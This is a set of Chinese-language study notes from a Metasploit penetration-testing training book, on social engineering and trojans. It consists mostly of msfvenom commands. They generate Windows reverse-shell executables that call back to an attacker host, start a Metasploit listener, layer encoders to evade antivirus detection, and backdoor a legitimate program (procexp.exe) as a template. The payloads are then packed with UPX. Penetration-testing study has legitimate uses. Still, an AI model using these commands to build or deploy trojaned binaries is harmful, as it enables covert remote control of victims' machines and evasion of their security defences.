《Metasploit渗透测试魔鬼训练营》笔记 社会工程学&木马

社会工程学就是通过分攻击对象的心里弱点，利用人类的本能反应以及人的好奇，贪婪等心理特征进行的，使用诸如假冒，欺骗，引诱等多种手段来达成攻击目标的一种攻击手段。

木马

添加链接描述

msfvenom

参数	描述	备注
-p,–paypload	指定payload
–payload-options	payload选项
-l ,–list [type]	payloads,encoders,nops,all
-n,–nopsled
-f,–format ,–help-formats
-e,–encoder
-a,–arch ,–platform ,–help-platforms	架构平台
-s,–space ,–encoder-space	最大长度
-b,–bad-chars
-i,–iterations	encode次数
-c,–add-code	Specify an additional win32 shellcode file to include
-x,–template	使用自定义可执行文件 作为模板
-k,–keep	保留原文件功能
-o,–out
-v,–var-name ,–smallest	Specify a custom variable name to use for certain output formats, Generate the smallest possible payload

使用MSF攻击载荷生成器创建可独立运行的二进制文件

msfvenom -p windows/shell_reverse_tcp --payload-options
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.200 LPORT=31337 -f exe -o payload1.exe
在Metasploit框架启动监听并在目标机器上运行：

msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD windows/shell_reverse_tcp 
PAYLOAD => windows/shell_reverse_tcp
msf exploit(handler) > set LHOST 10.10.10.200
LHOST => 10.10.10.200
msf exploit(handler) > set LPORT 31337
LPORT => 31337
msf exploit(handler) > run

躲避杀毒软件的检测

使用MSF编码器

msfvenom -l encoders

Name	Rank	Description
cmd/echo	good	Echo Command Encoder
cmd/generic_sh	manual	Generic Shell Variable Substitution Command Encoder
cmd/ifs	low	Generic ${IFS} Substitution Command Encoder
cmd/perl	normal	Perl Command Encoder
cmd/powershell_base64	excellent Powershell Base64 Command Encoder
cmd/printf_php_mq	manual	printf(1) via PHP magic_quotes Utility Command Encoder
generic/eicar	manual	The EICAR Encoder
generic/none	normal	The “none” Encoder
mipsbe/byte_xori	normal	Byte XORi Encoder
mipsbe/longxor	normal	XOR Encoder
mipsle/byte_xori	normal	Byte XORi Encoder
mipsle/longxor	normal	XOR Encoder
php/base64	great	PHP Base64 Encoder
ppc/longxor	normal	PPC LongXOR Encoder
ppc/longxor_tag	normal	PPC LongXOR Encoder
sparc/longxor_tag	normal	SPARC DWORD XOR Encoder
x64/xor	normal	XOR Encoder
x64/zutto_dekiru	manual	Zutto Dekiru
x86/add_sub	manual	Add/Sub Encoder
x86/alpha_mixed	low	Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper	low	Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_underscore_tolower	manual	Avoid underscore/tolower
x86/avoid_utf8_tolower	manual	Avoid UTF8/tolower
x86/bloxor	manual	BloXor - A Metamorphic Block Based XOR Encoder
x86/bmp_polyglot	manual	BMP Polyglot
x86/call4_dword_xor	normal	Call+4 Dword XOR Encoder
x86/context_cpuid	manual	CPUID-based Context Keyed Payload Encoder
x86/context_stat	manual	stat(2)-based Context Keyed Payload Encoder
x86/context_time	manual	time(2)-based Context Keyed Payload Encoder
x86/countdown	normal	Single-byte XOR Countdown Encoder
x86/fnstenv_mov	normal	Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive	normal	Jump/Call XOR Additive Feedback Encoder
x86/nonalpha	low	Non-Alpha Encoder
x86/nonupper	low	Non-Upper Encoder
x86/opt_sub	manual	Sub Encoder (optimised)
x86/shikata_ga_nai	excellent	Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit	manual	Single Static Bit
x86/unicode_mixed	manual	Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper	manual	Alpha2 Alphanumeric Unicode Uppercase Encoder

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.200 LPORT=31337 -e x86/shikata_ga_nai -f exe -o payload2.exe

file payload2.exe payload2.exe: PE32 executable (GUI) Intel 80386, for MS Windows

多重编码
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.200 LPORT=31337 -e x86/shikata_ga_nai -i 10 -f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows -i 5 -f raw | msfvenom -e x86/shikata_ga_nai -a x86 --platform windows -i 10 -f raw | msfvenom -e x86/countdown -a x86 --platform windows -i 10 -f exe -o payload3.exe

自定义文件模板
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.200 LPORT=31337 -e x86/shikata_ga_nai -x procexp.exe -i 10 -f exe -o pe_backdoor.exe

加壳 upx

Usage: upx [-123456789dlthVL] [-qvfk] [-o file] file..

Commands:
  -1     compress faster                   -9    compress better
  -d     decompress                        -l    list compressed file
  -t     test compressed file              -V    display version number
  -h     give more help                    -L    display software license
Options:
  -q     be quiet                          -v    be verbose
  -oFILE write output to 'FILE'
  -f     force compression of suspicious files
  -k     keep backup files
file..   executables to (de)compress

```upx -5 payload3.exe `